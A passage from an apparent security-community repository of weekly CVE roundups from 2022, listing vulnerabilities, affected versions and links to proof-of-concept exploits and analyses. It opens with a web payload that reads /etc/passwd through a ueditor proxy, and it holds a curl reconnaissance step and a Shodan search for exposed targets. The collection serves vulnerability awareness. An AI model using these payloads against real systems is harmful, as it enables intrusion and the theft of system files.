/static/ueditor/php/controller.php?action=proxy&remote=php://filter/convert.base64-encode/resource=/etc/passwd&maxwidth=-1&referer=test\n \n - [Chainning CVE-2021-42278 and CVE-2021-42287 PoC](https://github.com/Ridter/noPac)\n - Discription/Issue : Exploiting [CVE-2021-42278 and CVE-2021-42287](https://4sysops.com/archives/exploiting-the-cve-2021-42278-samaccountname-spoofing-and-cve-2021-42287-deceiving-the-kdc-active-directory-vulnerabilities/) to impersonate DA from standard domain user. \n\n - [CVE-2022-25260](https://github.com/yuriisanin/CVE-2022-25260)\n \n - Target & Patched Version : **JetBrains Hub <2021.1.14276**\n - Title : JetBrains Hub pre-auth semi-blind server-side request forgery (SSRF).\n \n - Description : JetBrains Hub before 2021.1.14276 was vulneable to improper access control (CVE-2022-34894), which allows an attacker create untrusted services without authentication even if guest user is disabled. This makes it possible to exploit the vulnerablity without any other requirements (normally an attacker should be at least authenticated). The vulnerability was possible due to use of Apache Batik with default settings for user-supplied SVG icon rasterization.\n \n### CVE Analysis : \n- This is a trail segment where we're experimenting the idea to track and filter out IT professional essential software and We're planning to provide CVE update for selected company such as Apple, Google, Microsoft, Github, Android, Linux(Ubuntu, kali etc), D-Link and CVE listed on Nation Cyber Awareness System. Let me know the if you have suggestion or want to add your favorite company this list.\n\n - Vulnerability in NVIDIA Data Plane Development Kit Affecting Cisco Products(Cisco Catalyst 8000V Edge Software, Adaptive Security Virtual Appliance (ASAv) & Secure Firewall Threat Defense Virtual (formerly FTDv))\n - Apple iOS, iPadOS, and macOS Input Validation Vulnerability CVE-2020-9934\n - Oracle WebLogic Server Unspecified Vulnerability CVE-2018-2628\n - Cisco Webex Meetings App (affected version <=42.7) Character Interface Manipulation Vulnerability. \n - Google Chromium Insufficient Data Validation Vulnerability CVE-2022-3075\n - Android OS Privilege Escalation Vulnerability CVE-2011-1823\n - [Ubuntu Security Patched.](https://ubuntu.com/security/notices) \n - Ubuntu 20.04 LTS : Linux kernel (Azure CVM) vulnerabilities.\n - Ubuntu 16.04 ESM & Ubuntu 14.04 ESM : Dnsmasq vulnerability, LibTIFF vulnerabilities, Linux kernel (HWE) vulnerabilities, linux-oracle - Linux kernel for Oracle Cloud systems.\n - D-Link DIR-816L RCE Vulnerability CVE-2022-28958\n - D-Link DIR-820L RCE Vulnerability CVE-2022-26258\n - D-Link Multiple Routers OS Command Injection Vulnerability CVE-2018-6530\n - D-Link DIR-300 Router Cleartext Storage of a Password Vulnerability CVE-2011-4723\n - NETGEAR Multiple Devices Exposure of Sensitive Information Vulnerability CVE-2017-5521\n---\n \n - [CVE-2022-34169 Analysis](https://noahblog-360-cn.translate.goog/xalan-j-integer-truncation-reproduce-cve-2022-34169/?_x_tr_sch=http&_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp) & construction of [full exploit](https://gist-github-com.translate.goog/thanatoskira/07dd6124f7d8197b48bc9e2ce900937f?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp)\n \n - Target: **Apache Xalan-J - A Java version implementation of an XSLT processor.**\n \n - Discription/Issue : In short a vulnerability in Xalan-J, an Apache project used by multiple SAML implementations, could allow arbitrary code execution and Felix Wilhelm(Security Researcher at Project Zero- Google) said that Xalan-J is vulnerable to an XSLT(a markup language that can transform XML documents into other formats, such as HTML.) Integer Truncation issue when processing malicious XSLT stylesheets.\n\n - [CVE-2022-31474 Wordpress](https://www.wordfence.com/blog/2022/09/psa-nearly-5-million-attacks-blocked-targeting-0-day-in-backupbuddy-plugin/)\n \n - Target: **WordPress plugin - BackupBuddy**\n - Affected Version : 8.5.8.0 and 8.7.4.1.\n - Fully Patched Version: 8.7.5\n \n - Discription/Issue : WordPress websites running BackupBuddy plugin with 140,000 active installations, is meant to help WordPress site administrators easily manage their backup operations. The plugin allows users to store the backups to various online and local destinations is vulnerability and CVE assigned to this vulnerability is CVE-2022-31474 with a CVSS score of 7.5, the exploited vulnerability exists because of an insecure method of downloading the backups for local storing, which enables unauthenticated attackers to download sensitive files from vulnerable sites.\n\n -[](https://github.com/emirpolatt/CVE-2022-31188)\n\n ---\n ### EXPLOIT : \n - [Mobile Mouse 3.6.0.4 Remote Code Execution](https://github.com/blue0x1/mobilemouse/blob/main/mobilemouse.py) \n - Exploit Author: Chokri Hammedi\n - Vendor Homepage: https://mobilemouse.com/\n - Software Link: https://www.mobilemouse.com/downloads/setup.exe\n - Version: 3.6.0.4\n - Tested on: Windows 10 Enterprise LTSC Build 17763\n - Discription: Mobile Mouse 3.6.0.4 could allow a remote attacker to execute arbitrary code on the system, caused by improper input validation. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary code on the system. \n\n
\n---\n
\n \n \nCVE's that matter [#Weekly Infosec Update](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/) -> 30th August - 07th September 2022 \n\n CVE POC exploit : CVE-2022-1388, CVE-2022-32250 and CVE-2022-2639.\n \n CVE Analysis : CVE-2022-30592, CVE-2021-38297, CVE-2022-31814, CVE-2022-21371, CVE-2022-24637, CVE-2022-33174, CVE-2022-1802, \n CVE-2022-23779, CVE-2022-24637, CVE-2022-35406 and Week#35 of Advisory Week Newsletter.\n \n \n\n\n - [CVE-2022-30592](https://github.com/efchatz/HTTP3-attacks)\n \n - Target: **QUIC-enabled servers (IIS, NGINX, LiteSpeed, Cloudflare, H2O, and Caddy)**\n - Discription/Issue : HTTP3-attacks : The current repository serves the purpose of sharing the scripts we used for educational usage. These attacks were a part of our study, and were tested against 6 different QUIC-enabled servers that were configured to communicate with HTTP/3. The http-stream script is the exploit of the CVE-2022-30592 issue that affected lsquic library. This script can also be exploited against Litespeed server.\n \n - [CVE-2021-38297 Analysis](https://jfrog.com/blog/cve-2021-38297-analysis-of-a-go-web-assembly-vulnerability/)\n \n - Target: **Golang (“Go”) programming language**\n - Patched : fixed versions (1.16.9, 1.17.2 or later).\n - Discription/Issue : @jfrog has elaborate the prerequisites for exploiting the Go vulnerability, which allows an attacker to override an entire Wasm (WebAssembly) module with its own malicious code and achieve WebAssembly code execution, and explore mitigation strategies for developers.\n \n- [CVE-2022-23779](https://github.com/Vulnmachines/Zoho_CVE-2022-23779)\n \n - Product: **ZOHO**\n - Discription/Issue : Zoho Internal Hostname Disclosure Vulnerability\n \n Step 1: curl -ILk https://IP:port/themes\n Step 2: Read the HTTP redirect response and anaylze the Location HTTP response header.\n BONUS #Shodan : title:\"ManageEngine Desktop Central 10\"\n\n- [CVE-2022-2639 PoC](https://drive.google.com/drive/folders/1f5YzKy_NChwlbYqHp-7Ih3RTSTBq9Ns6?usp=sharing)\n \n - Target: **Linux kernel openvswitch local privilege escalation.**\n - Tested on : 5.13, 5.4, 4.18.\n - Discription/Issue : Using pipe-primitive to exploit CVE-2022-2639, so no kaslr leak nor smap smep ktpi bypass is needed.\n\n- [CVE-2022-31814 Analysis](https://www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/)\n \n - Target/Product: **pfBlockerNG plugin**\n - Affected Version : <= 2.1.4_26\n - Discription/Issue : IHTeam undertook an independent security assessment of pfsense’s pfBlockerNG plugin version 2.1.4_26 and identified Unauthenticated Remote Command Execution as root (CVE-2022-31814).\n \n \n - [CVE-2022-21371](https://github.com/Vulnmachines/Oracle-WebLogic-CVE-2022-21371)\n \n - Target/Product: **Oracle Fusion Middleware's Oracle WebLogic Server product **\n - Affected Version : 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0\n - Discription/Issue : The Oracle Fusion Middleware's Oracle WebLogic Server product (Web Container component) is vulnerable to local file inclusion. An easily exploited vulnerability could allow an unauthenticated attacker with HTTP network access to compromise Oracle WebLogic Server. A successful attack on this vulnerability, provide hackers complete access to Oracle WebLogic Server's whole data store or unrestricted access to sensitive data.\n\n - [CVE-2022-1388_PoC](https://github.com/alt3kx/CVE-2022-1388_PoC)\n \n - Target: **F5 BIG-IP RCE exploitation**\n - Affected Version : On F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions, undisclosed requests may bypass iControl REST authentication.\n - Discription/Issue : F5 BIG-IP RCE exploitation (CVE-2022-1388)\n\n - [CVE-2022-33174](https://github.com/Henry4E36/CVE-2022-33174)\n \n - Target/Product: **[Powertek PDUs](https://www.powertekpdus.com/)**\n - Affected Version : Powertek PDU 3.30.30\n - Discription/Issue : Powertek PDUs are high quality custom rack power distribution units from Powertek Corporation. There is a security vulnerability in Powertek PDU versions prior to 3.30.30. The vulnerability stems from the fact that the power distribution unit allows remote authorization to be bypassed in the web interface. The vulnerability can be exploited by an attacker to obtain the username and password in clear text.\n \n - [CVE-2022-24637](https://github.com/JacobEbben/CVE-2022-24637)\n \n - Target/Product : **Open Web Analytics (OWA)**\n - Affected Version : <1.7.4.\n - Discription/Issue : Exploit for the Unauthenticated RCE in Open Web Analytics (OWA) <1.7.4. This work is based on https://devel0pment.de/?p=2494.\n\n\n - [CVE-2022-1802 + CVE-2022-1529 + CVE-2022-2200](https://github.com/mistymntncop/CVE-2022-1802)\n \n - Tested: **Firefox 100.0.1**\n - Discription/Issue : Firefox 100.0.1 RCE Object prototype, they could set undesired attributes on a JavaScript object, leading to privileged code execution.\n\n - [CVE-2022-35406 Writeups](https://medium.com/@mr.vrushabh/discovery-of-cve-2022-35406-303f4bca2742)\n - Discription/Issue : @mr.vrushabh found the CVE-2022-35406 on PortSwigger Web Security. This was a bug in Repeater/Intruder whereby a meta redirect would be followed when a user clicked the follow redirection button regardless of the content type or content disposition headers used on the target web site. This could disclose the referrer header. It was considered a low severity issue because the attack scenario involved multiple unlikely steps that involved user interaction. \n\n - In week 35 of Advisory Week Newsletter. You'll be seeing update on [Security Fixed on Apple, Microsoft, Github, Red Hat, Ubuntu, Mozilla and Nation Cyber Awareness System](https://advisoryweek.com/) \n\n
\n---\n
\n \n\nCVE's that matter [Weekly Infosec Update](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/) -> 23rd - 30th August 2022\n\n \n CVE POC exploit : CVE-2022-32250, CVE-2022-37042, CVE-2022-38766, CVE-2022-23779, CVE-2022-32250-Linux-Kernel-LPE, \n CVE-2022-22715 , CVE-2022-37153, CVE-2022-2884, CVE-2022-2586 and CVE-2022-LPE-UAF.\n \n CVE Analysis : CVE-2022-20233, Multiple CVE in TENDA, CVE-2022-24787, CVE-2022-33318, CVE-2022-2884, CVE-2022-26377, \n CVE-2020-2733 and CVE-2022-30129. \n\n \n \n - [CVE-2022-32250 Exploit](https://github.com/theori-io/CVE-2022-32250-exploit)\n - Target: **Linux-Kernel**\n - Affected Version: Linux, before commit 520778042ccca019f3ffa136dd0ca565c486cedd (26 May, 2022) & Ubuntu <= 22.04 before security patch.\n \n - Discription :CVE-2022-32250 allows a local user to escalate privileges to root because an incorrect NFT_STATEFUL_EXPR check leads to a use-after-free(UAF). \n\n- [N-day exploit for CVE-2022-2586 - Analysis](https://www.openwall.com/lists/oss-security/2022/08/29/5)\n - Target/Product: **Linux Kernel nft_boject UAF**\n - Affected Version : 3.16-rc1\n \n - Discription : The vulnerability is a Use-After-Free (UAF) in nf_tables, that makes it possible to escalate privileges from any user to root, and it is present since kernel version v3.16-rc1. To exploit this bug we need to enter a new network namespace to obtain `CAP_NET_ADMIN` (i.e: unprivileged user namespaces must be enabled, which is the case on most Linux distributions nowadays).\n\n - [CVE-2022-22715 POC](https://github.com/k0keoyo/my_vulnerabilities/tree/master/CVE-2022-22715)\n - Target: **Window OS**\n - Discription : In February 2022, Microsoft patched the vulnerability k0keoyo used in TianfuCup 2021 for escaping Adobe Reader sandbox, assigned CVE-2022-22715. The vulnerability existed in Named Pipe File System nearly 10 years since the AppContainer was born. We called it \"Windows Dirty Pipe\".\n - Root Cause : The vulnerability existed in Named Pipe File System Driver - npfs.sys, and the issue function is npfs!NpTranslateContainerLocalAlias. When we invoking NtCreateFile with a named pipe path, it will hit the IRP_MJ_CREATE major function of npfs, it called NpFsdCreate.\n\n - [CVE-2022-20233 Analysis](https://blog.quarkslab.com/attacking-titan-m-with-only-one-byte.html)\n - Product: **Titan M - A security chip introduced by Google in their Pixel smartphones, starting from the Pixel 3.**\n - Patched : Pixel Security update of June 2022.\n \n - Discription/Issue : On 2022-08-11, Google awared Quarkslab's engineers Damiano Melotti and Maxime Rossi $75,000, and Damiano Melotti and Maxime Rossi Bellom presented their Titan M vulnerability research project at the Black Hat USA 2022 Briefings in Las Vegas. You can also Check out this week Tools section find vulnerability on Titan M.\n\n - [Multiple CVE in TENDA](https://github.com/Darry-lang1/vuln/tree/main/Tenda/AC1206/4)]\n - Product: **Tenda AC1206 Router**\n - Affected Version : V15.03.06.23\n \n - Discription/Issue : Recenty, Multiple CVE has been assigned for Tenda AC1206. CVE that you must checkout CVE-2022-37798, CVE-2022-37799, CVE-2022-37800, CVE-2022-37801, CVE-2022-37802, CVE-2022-37803, CVE-2022-37804, CVE-2022-37805, CVE-2022-37806 & CVE-2022-37807.\n\n - [CVE-2022-24787 Report analysis](https://securitylab.github.com/advisories/GHSL-2022-001_Orckestra_C1_CMS/)\n - Target/Product: **Orckestra C1 CMS - Content Management System that scales out in the cloud.**\n - Version: v6.11\n \n - Discription : @JarLob (Jaroslav Lobačevski) reported an issue highlighting \"Deserialization of untrusted data(GHSL-2022-001) allows for Server Side Request Forgery (SSRF) or arbitrary file truncation.\"\n \n - [CVE-2022-38766 POC]\n - Target/Product: **Renault 2021 ZOE Electronic car**\n \n - Discription/Issue : This vulnerability raised the question of whether ZOE electric vehicles are safe form RF hacking. For this reason, the actual ZOE vehicle released this year was targeted and attacked. A study was also conducted on how this attack bypass the rolling codes, a defense technique of RF hacking, and a lot of thought was needed about the handling method in case the car breaks down.\n \n - [CVE-2022-37042 POC Exploit](https://github.com/aels/CVE-2022-37042)\n - Target: **Zimbra**\n - Discription : Zimbra CVE-2022-37042 Nuclei weaponized template shell path: /public/formatter.jsp\n \n - [CVE-2022-23779 Proof-of-Concept Exploit](https://github.com/Vulnmachines/Zoho_CVE-2022-23779)\n - Target: **ZOHO**\n - Discription : Internal Hostname Disclosure Vulnerability\n\n - [CVE-2022-33318 - Remote Code Execution in ICONICS Genesis64](https://github.com/0vercl0k/paracosme)\n - Target: **Genesis64 suite**\n - Version: 10.97.1\n \n - Discription : Paracosme (Remote Code Execution in ICONICS Genesis64 exploit) was demonstrated during the Pwn2Own 2022 Miami contest that took place at the S4x22 Conference. Paracosme exploits a use-after-free issue found in the GenBroker64 process to achieve remote code execution on a Windows 21H2 x64 system.At a high level, the GenBroker64 process listens on the TCP port 38080 and is able to deserialize various packets after a handshake has been done with a client. The isue I found is in the code that handles reading a VARIANT from the network socket. Basically a variant is a type and a value. The function seems well-written at first sight, and takes efforts to only unpacks certain types. \n \n\n - [CVE-2022-2884](https://about.gitlab.com/releases/2022/08/22/critical-security-release-gitlab-15-3-1-released/)\n - Target: **GitLab**\n - Version: 15.3.1, 15.2.3, 15.1.5\n \n - Discription : There is a critical vulnerability with the identifier CVE-2022-2884 and a score of 9.9 in versions 11.3.4 to 15.1.4 and between 15.2 and 15.2.3, as well as 15.3 community and enterprise versions, which allows the hacker to execute code remotely. provides This vulnerability occurs in GitHub import.\n\n\n - [CVE - 2022-LPE-UAF](https://github.com/greek0x0/2022-LPE-UAF )\n - Target: **Linux kernel**\n \n - Discription : Security researchers discovered 3 vulnerabilities in the Linux kernel that could allow a local attacker to elevate privileges and potentially execute malicious code. [Paper on Dirtycred by Zhenpeng](https://zplin.me/papers/DirtyCred-Zhenpeng.pdf)\n\n\n - [CVE-2022-26377 Analysis](http://noahblog.360.cn/apache-httpd-ajp-request-smuggling/)\n - Target: **Apache HTTPd**\n - Title : apache-httpd-ajp-request-smuggling :\n \n - Discription : This article introduces a new attack method and idea for AJP, which can be used in applications such as Apache HTTPd proxy_ajpThe attack surface of the reverse proxy for Tomcat AJP, the product self-developed AJP reverse proxy, and the horizontal expansion to FastCGI and other protocols can also be attempted (of course, no other protocols have been dug). \n\n - [CVE-2020-2733 Analysis](https://redrays.io/cve-2020-2733-jd-edwards/)\n - Product: ** Oracle JD Edwards EnterpriseOne Tools**\n - Affected Version : < 9.2\n \n - Discription/Issue : The vulnerability was discovered in the Oracle JD Edwards Management portal. To reproduce the vulnerability, you need to open (without authentication) the following [URL](http://JDEdwards:8999/manage/fileDownloader?sec=1) When you open the URL, you can see pseudo-random text in the page. ACHCJKGJHCJKBLLALOLOJFCABEFHOALDDAOFNGGANPDB. After analyzing the JD Edwards jar files, Researcher discovered that this pseudo-random data is – THE ENCRYPTED ADMIN PASSWORD!\n\n - [CVE-2022-30129 - Analysis](https://blog.sonarsource.com/securing-developer-tools-argument-injection-in-vscode/)\n - Target/Product: **Microsoft - Virtual Studio Code**\n - Affected Version : 1.67.1\n \n - Discription/Issue : Argument Injection in Visual Studio Code : The vulnerability can be used to target developers that have the Visual Studio Code IDE installed. Upon clicking on a malicious link crafted by an attacker, victims are prompted to clone a Git repository in Visual Studio Code. \n\n
\n--- \n
\n \nCVE's that matter Week 03-> 16th - 22nd Aug 2022** \n\n\n- [CVE-2022-1802 POC Exploit](https://github.com/mistymntncop/CVE-2022-1802)\n - Target: **Amazon-Linux 2 : thunderbird Package**\n - Version Affected: <0:91.9.1-1.amzn2.0.1 \n - Discription : The Mozilla Foundation Security Advisory describes this flaw as:\n An attacker could have sent a message to the parent process where the contents were used to double-index into a JavaScript object, leading to prototype pollution and ultimately attacker-controlled JavaScript executing in the privileged parent process. (CVE-2022-1529).\n\n- [CVE-2022-35742](https://blog.78researchlab.com/b9c80d00-d935-43b1-8805-969000df301d)\n - Target: **Window Outlook**\n - Patched on August 2022\n - Discription : Denial of serice at Outlook where attacker can triger a vulnerability by sending crafteted email and vulnerability occurs during MIME property parsing.\n\n - [CVE-2021-43811 POC](https://github.com/s-index/CVE-2021-43811)\n - Target: **awslabs/sockeye**\n - Version: < 2.3.24 \n - Discription :Sockeye is an open-source sequence-to-sequence framework for Neural Machine Translation built on PyTorch. Sockeye uses YAML to store model and data configurations on disk. Versions below 2.3.24 use unsafe YAML loading, which can be made to execute arbitrary code embedded in config files. An attacker can add malicious code to the config file of a trained model and attempt to convince users to download and run it. If users run the model, the embedded code will run locally. The issue is fixed in version 2.3.24.\n\n- [CVE-2020-6369 Patch bypass](https://redrays.io/cve-2020-6369-patch-bypass/)\n - Target: **CA Introscope Enterprise Manager’s**\n - Version Affected :\n WILY_INTRO_ENTERPRISE 9.7\n WILY_INTRO_ENTERPRISE 10.1\n WILY_INTRO_ENTERPRISE 10.5\n WILY_INTRO_ENTERPRISE 10.7\n - Discription : CA Introscope Enterprise Manager’s releases 10.7.0.306 or lower, allow unauthenticated attackers to bypass the authentication if the administrator has not changed the default passwords for Admin and Guest. This may impact the confidentiality of the service.\n\n - [CVE-2022-36966]\n - Target: **Orion platform**\n - Discription : CVE-2022-36966 has been assigned as the Zero-Day for the escalation of privilege in Orion platform.The exploit requires internal + initial access. Details will be shared as SolarWinds provides official feedback. The vulnerability was identified by researcher 'Asim Khan'\n\n\n - [1day to 0day(CVE-2022-30024) on TP-Link TL-WR841N](https://blog.viettelcybersecurity.com/1day-to-0day-on-tl-link-tl-wr841n/)\n - Target: **TP-Link TL-WR841N devices**\n - Discription : Vulnerabilities on TP-Link TL-WR841N devices CVE-2020-8423 \tData parsing,CVE-2022-24355 \tFile extensions handling & CVE-2022-30024 \tAssignment data\n\n\n - [CVE-2022-27255 POC](https://github.com/infobyte/cve-2022-27255/tree/main/exploits_nexxt)\n - Target: **Realtek eCos SDK SIP ALG buffer overflow**\n - Vulnarable Device : \n \n Nexxt Nebula 300 Plus\n Tenda F6 V5.0\n Tenda F3 V3\n Tenda F9 V2.0\n Tenda AC5 V3.0\n Tenda AC6 V5.0\n Tenda AC7 V4.0\n Tenda A9 V3\n Tenda AC8 V2.0\n Tenda AC10 V3\n Tenda AC11 V2.0\n Tenda FH456 V2.0\n Zyxel NBG6615 V1.00\n Intelbras RF 301K V1.1.15\n Multilaser AC1200 RE018\n iBall 300M-MIMO (iB-WRB303N)\n Brostrend AC1200 extender\n MT-Link MT-WR850N\n MT-Link MT-WR950N\n Everest EWR-301\n D-Link DIR-822 h/w version B\n Speedefy K4\n Ultra-Link Wireless N300 Universal Range Extender\n Keo KLR 301\n QPCOM QP-WR347N\n NEXT 504N\n Nisuta NS-WIR303N (probably V2)\n Rockspace AC2100 Dual Band Wi-Fi Range Extender\n KNUP KP-R04\n Hikvision DS-3WR12-E\n\n - Discription : PoC and exploit code. The PoC should work on every affected router, however the exploit code is specific for the Nexxt Nebula 300 Plus router. For More - https://github.com/infobyte/cve-2022-27255\n\n\n - [CVE-2022-37393 Technical Analysis](https://attackerkb.com/topics/92AeLOE1M1/cve-2022-37393/rapid7-analysis)\n - Target: ** Zimbra Collaboration Suite**\n - Discription : We are not aware of active exploitation of CVE-2022-37393 at this time, but it could be very difficult to detect successful exploitation because it grants root access.\n\n\n - [CVE-2022-21881 POC](https://github.com/theabysslabs/CVE-2022-21881)\n - Target: **TianfuCup 2021**\n - Discription : POC of CVE-2022-21881 exploited at TianfuCup 2021 to escape Chrome Sandbox \n\n - [CVE-2022-29805 Analysis](https://www.whiteoaksecurity.com/blog/fishbowl-disclosure-cve-2022-29805/)\n - Target: **Fishbowl**\n - Version: <2022.4.1.\n - Discription : White Oak Security discovered an instance of Fishbowl Inventory that was vulnerable to a Java deserialization vulnerability, resulting in unauthenticated remote code execution. \n \n - [CVE-2022-37042 Zimbra Authentication Bypass](https://github.com/projectdiscovery/nuclei-templates/pull/5134/files)\n - Target: **Zimbra**\n - Discription : Nuclei Zimbra: Release of CVE-2022-37042 Zimbra Authentication Bypass Causing RCE Non-Destructive Vulnerability Detection Template.\n \n
\n---\n
\n \nCVE's that matter Week 02-> 9 - 16 Aug 2022\n\n\n - [CVE-2022-27255](https://github.com/infobyte/cve-2022-27255)\n - Target: **Realtek eCos SDK SIP ALG buffer overflow.**\n - Discription : This repository contains de materials for the talk \"Exploring the hidden attack surface of OEM IoT devices: pwning thousands of routers with a vulnerability in Realtek’s SDK for eCos OS.\", which was presented at DEFCON30.\n\n - [CVE-2022-30216]()\n - Target: **Windows Server service**\n - Version: Windows 11/Server 2022 machine.\n - Discription : PoC of the srvsvc auth coerce vulnerability [(CVE-2022-30216) : Authentication coercion of the Windows “Server” service.](https://www.akamai.com/blog/security/authentication-coercion-windows-server-service)\n\n\n - [CVE-2022-36446 POC](https://github.com/p0dalirius/CVE-2022-36446-Webmin-Software-Package-Updates-RCE)\n - Target: **Webmin**\n - Version: < 1.997. \n - Discription : A Python script to exploit CVE-2022-36446 Software Package Updates RCE (Authenticated) on Webmin.\n\n - [DashOverright POC]()\n - Target: **VMware vRealize Operations Manager**\n - Version : <= 8.6.3.19682901. \n - Discription : This is a pre-authenticated RCE exploit for VMware vRealize Operations Manager (vROPS) that impacts versions <= 8.6.3.19682901. \n This exploit chains three vulnerabilities that have been patched.\n CVE-2022-31675 - MainPortalFilter ui Authentication Bypass\n CVE-2022-31674 - SupportLogAction Information Disclosure\n CVE-2022-31672 - generateSupportBundle VCOPS_BASE Privilege Escalation\n\n - [CVE-2021-43908 Analysis](https://blog.electrovolt.io/posts/vscode-rce/)\n - Target: **Virtual Studio Code**\n - Discription: Visual Studio Code - Remote Code Execution in Restricted Mode (CVE-2021-43908)\n \n - [CVE-2022-31101 POC](https://github.com/karthikuj/CVE-2022-31101)\n - Target: **PrestaShop** is the universal open-source software platform to build your e-commerce solution. \n - Discription: Exploit for PrestaShop bockwishlist module 2.1.0 SQLi \n\n - [CVE-2022-33980](https://github.com/HKirito/CVE-2022-33980)\n - Target: **apache**\n - Version: \t2.2.4 to 2.7-2\n - Discription: Apache Commons RCE can use url,dns,script key-words to connect any server.\n\n - Micosoft security update that matter : \n - [CVE-2022-34715 POC](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34715) - Discription: Windows Network File System Remote Code Execution Vulnerability.\n - [CVE-2022-30133](https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30133) - Discription: Windows Point-to-Point Protocol (PPP) Remote Code Execution Vulnerability (Disable port 1723)\n - [CVE-2022-34713](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34713) - Discription: 0-days DogWalk- Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability\n\n - [CVE-2020-0796](https://github.com/msuiche/smbaloo)\n - Target: **Windows ARM64**\n - Discription: A CVE-2020-0796 (aka \"SMBGhost\") exploit for Windows 10 18362 ARM 64-bit (AArch64)\n \n- [Vulnerabilities in Cisco Small Business products](https://pastebin.com/8w2VVXn2)\n - CVE-2022-20842 \n - CVE-2022-20827 \n - CVE-2022-20841\n\n- [Multiple Vulnerabilities in Cisco ASA, ASDM, and FirePOWER Services Software has not been FIXED](https://www.rapid7.com/blog/post/2022/08/11/rapid7-discovered-vulnerabilities-in-cisco-asa-asdm-and-firepower-services-software/)\n - Cisco ASDM binary packages \t\n - CVE-2022-20829 \tNot fixed** \n - None(CVE not Assigned Yet) \tNot fixed\n - Cisco ASDM (7.17.1.155). \t\n - CVE-2022-20651 \tFixed\n - Cisco ASDM client (fixed in ASDM 7.18.1.150, but Rapid7 has informed Cisco that the issue was in fact not addressed and remains unfixed. \n - CVE-2021-1585 CSCvw79912 \tNot fixed**\n - Cisco ASDM binary package code execution mechanism to be used with CVE-2022-20829 or CVE-2021-1585. \t \n - CSCwc21296 \tFixed\n - Cisco ASA-X with FirePOWER Services \n - CVE-2022-20828 \tFixed in most maintained versions\n - Cisco FirePOWER module before 6.6.0 \t\n - CSCvo79327 \tFixed in most maintained versions\n - >= 7.0. Not fixed on ASA.\n - Cisco ASA with FirePOWER Services \n - None \tNot fixed\n - Some Cisco FirePOWER module\n - None \tNot fixed\n\n
\n---\n
\n \nCVE's that matter Week 01 -> 2 - 9 Aug 2022\n\n\n - [CVE-2022-36446 Exploit](https://www.exploit-db.com/exploits/50998)\n - Target: **Webmin**\n - Version: 1.996\n - Discription: [Remote Code Execution (RCE) Authenticated During Install New Packages.](https://medium.com/@emirpolat/cve-2022-36446-webmin-1-997-7a9225af3165)\n \n - [CVE-2022-2552 Exploit](https://github.com/SecuriTrust/CVEsLab/tree/main/CVE-2022-2552)\n - Target: **WordPress Plugin Duplicator**\n - Version: <=1.4.7\n - Discription : Unauthenticated System Information Disclosure \n - #Proof-Of-Concept: 1-System information.\n Some system information is obtained using the \"view\" parameter.\n http://[PATH]/backups-dup-lite/dup-installer/main.installer.php\n \n - [An **CVE-2022-29582-io-uring** subsystem of the Linux kernel vulnerability](https://ruia-ruia.github.io/2022/08/05/CVE-2022-29582-io-uring/)\n \n - [**CVE-2022-35405 Zoho** Password Manager Pro XML-RPC RCE](https://xz-aliyun-com.translate.goog/t/11578?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-GB)\n\n - [**CVE-2022-1215 - Analysis**](https://blog.coffinsec.com/nday/2022/08/04/CVE-2022-1215-libinput-fmt-canary-leak.html)\n - Target: **libinput library**\n - Version: < 1.20.0\n - Discription:nday exploit - A format string vulnerability exists in the libinput library, \n allowing a local attacker to achieve arbitrary code execution in the context of libinput.\n\n- [CVE-2022-34918 LPE POC](https://github.com/veritas501/CVE-2022-34918)\n - Target: *Linux Kernal module*(4 Aug 2022) \n - Version span: v5.8 ~ v5.19 \n - Discription: netfilter nf_tables local privilege escalation analysis \n \n - [Multiple CVE's on VMWARE miltiple products and a critical(9.8) CVE-2022-31656](https://www.vmware.com/security/advisories/VMSA-2022-0021.html)\n - Target: **VMWARE**\n - Version: 21.08.0.1, 21.08.0.0\n - Discription: VMware Workspace ONE Access, Access Connector, Identity Manager, Identity Manager Connector and vRealize Automation updates address multiple vulnerabilities.\n \n- [nex-forms-exploit](https://github.com/ehtec/nex-forms-exploit)\n - Target: *Wordpress plugin*(2nd August 2022)\n - Versions: <= 7.9.6)\n - Discription: Authenticatd SQL injection vulnerability in the \"NEX Forms\" Wordpress plugin .\n \n- [CVE-2022-2185](https://github.com/star-sg/CVE/tree/master/CVE-2022-2185)\n - Target: **GitLab**\n - Version: GitLab affecting all versions starting from 14.0 prior to 14.10.5, 15.0 prior to 15.0.4, and 15.1 prior to 15.1.1\n - Exploit Written By: [Nguyễn Tiến Giang](https://github.com/testanull)\n\n
\n" }, { "path": "ResetCybersecuirty/Readme.md", "content": "# WEEKLY INFOSEC UPDATE : v0.7\n \n- An initiative by [ResetHacker Community](https://github.com/RESETHACKER-COMMUNITY/What-Is-RESETHACKER)\n\n![](https://img.shields.io/github/issues/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/forks/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/stars/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/last-commit/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n\n\n Hey Hackers, Thankyou for visiting Weekly Infosec Update.\n\n![WeeklyInfosecUpdate_v0.7](https://user-images.githubusercontent.com/25515871/192681278-0cfb1d6f-c1a4-4e62-85f1-21f41724a4a0.png)\n\n
